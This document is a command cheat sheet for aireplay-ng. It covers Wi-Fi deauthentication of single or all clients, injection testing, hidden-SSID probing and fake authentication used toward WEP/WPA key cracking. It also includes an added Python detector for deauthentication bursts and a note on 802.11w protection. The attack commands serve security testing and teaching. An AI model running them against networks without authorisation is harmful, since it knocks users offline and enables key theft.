aireplay-ng injects and replays frames. Its main use is generating traffic that aircrack-ng later uses to crack WEP and WPA-PSK keys.
aireplay-ng implements several attacks: deauthenticating wireless clients to capture WPA handshake data, fake authentication, interactive packet replay, hand-crafted ARP request injection, and ARP-request re-injection.
Disconnect a client
This can be used when looking for a hidden SSID with airodump-ng.
# -0: send deauthentication (disconnect) frames. The number that follows is
# how many requests to send.
# Requires the network BSSID and the client MAC address
# (MAC/physical addresses)
BSSID="00:00:00:00:00:00"
CLIENT="11:11:11:11:11:11"
INTERFACE="wlan1"
aireplay-ng -0 15 -c "$CLIENT" -a "$BSSID" "$INTERFACE"
Deauthenticate (disconnect) all clients
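# Without -c, the request applies to all clients of the access point.
# If there is a channel problem, restart monitor mode on the right channel
# (5 is the channel number): airmon-ng start wlan1 5
# MAC/physical address
BSSID="00:00:00:00:00:00"
INTERFACE="wlan1"
aireplay-ng -0 1 -a "$BSSID" "$INTERFACE"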
Check if network card supports injection
# -9 (--test): injection test
# If the interface is blocked: rfkill list, then rfkill unblock IDENTIFIER
INTERFACE="wlan1"
aireplay-ng -9 "$INTERFACE"
Check a hidden SSID or check a specific SSID
# -a: Access point MAC address
# -e: Target SSID
# MAC/physical address
MAC="00:00:00:00:00:00"
SSID="WIFI_NETWORK_NAME"
INTERFACE="wlan1"
aireplay-ng --test -e "$SSID" -a "$MAC" "$INTERFACE"
Run the deauthentication attack
Run the deauthentication attack (-0), sending 5 packets to the wireless access point (-a) to deauthenticate a wireless client (-c) via the monitor-mode interface.
MAC="00:00:00:00:00:00"
CLIENT="mac address of client"
INTERFACE="wlan1"
aireplay-ng -0 5 -a "$MAC" -c "$CLIENT" "$INTERFACE"
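Seen from the monitoring side, the deauthentication frames produced by -0 are ordinary 802.11 management frames (type 0, subtype 12) that a sensor can count. The following is an added detection example, not part of the original page or of aircrack-ng; the MAC addresses, the sample frames, and the window and threshold values are constructed assumptions.

```python
import struct
from collections import defaultdict

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame):
    """Return (dest, src, bssid, reason) for a deauthentication frame, else None.
    `frame` starts at the 802.11 MAC header (radiotap header already removed)."""
    if len(frame) < 26:                      # 24-byte header + 2-byte reason code
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    if (ftype, subtype) != (0, 12):          # management frame, deauthentication
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def find_bursts(records, window=1.0, threshold=10):
    """records: time-ordered (timestamp, frame) pairs. Returns
    {(bssid, target): peak frames per window} for pairs at or over threshold.
    window and threshold are assumed values to tune per site."""
    seen = defaultdict(list)
    for ts, frame in records:
        parsed = parse_deauth(frame)
        if parsed:
            dest, src, bssid, _ = parsed
            # The target is the non-AP end; ff:ff:ff:ff:ff:ff means all clients.
            seen[(bssid, dest if dest != bssid else src)].append(ts)
    alerts = {}
    for key, times in seen.items():
        start = peak = 0
        for end, ts in enumerate(times):     # sliding window over timestamps
            while ts - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts

def build(dest, src, bssid, reason=7, subtype=12):
    """Construct a minimal management frame for the sample data below."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([subtype << 4, 0, 0, 0]) + raw(dest) + raw(src) + raw(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

# Constructed sample: a 20-frame burst, one isolated deauth, one beacon (subtype 8).
AP, CLIENT, OTHER = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"
SAMPLE = [(i * 0.01, build(CLIENT, AP, AP)) for i in range(20)]
SAMPLE += [(5.0, build(OTHER, AP, AP, reason=3)), (5.1, build("ff:ff:ff:ff:ff:ff", AP, AP, subtype=8))]
```

find_bursts(SAMPLE) flags only the AP/client pair that received the burst. Where the access point and clients use 802.11w Protected Management Frames, spoofed deauthentication frames are discarded by the receiver.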
Run the fake authentication attack
Run the fake authentication attack and re-authenticate every 6000 seconds (-1 6000) against the access point (-a) with the given SSID (-e), specifying our MAC address (-h) and using the monitor-mode interface wlan1.
SSID="WIFI_NETWORK_NAME"
MAC="00:00:00:00:00:00"
MYMAC="22:22:22:22:22:22"
INTERFACE="wlan1"
aireplay-ng -1 6000 -e "$SSID" -a "$MAC" -h "$MYMAC" "$INTERFACE"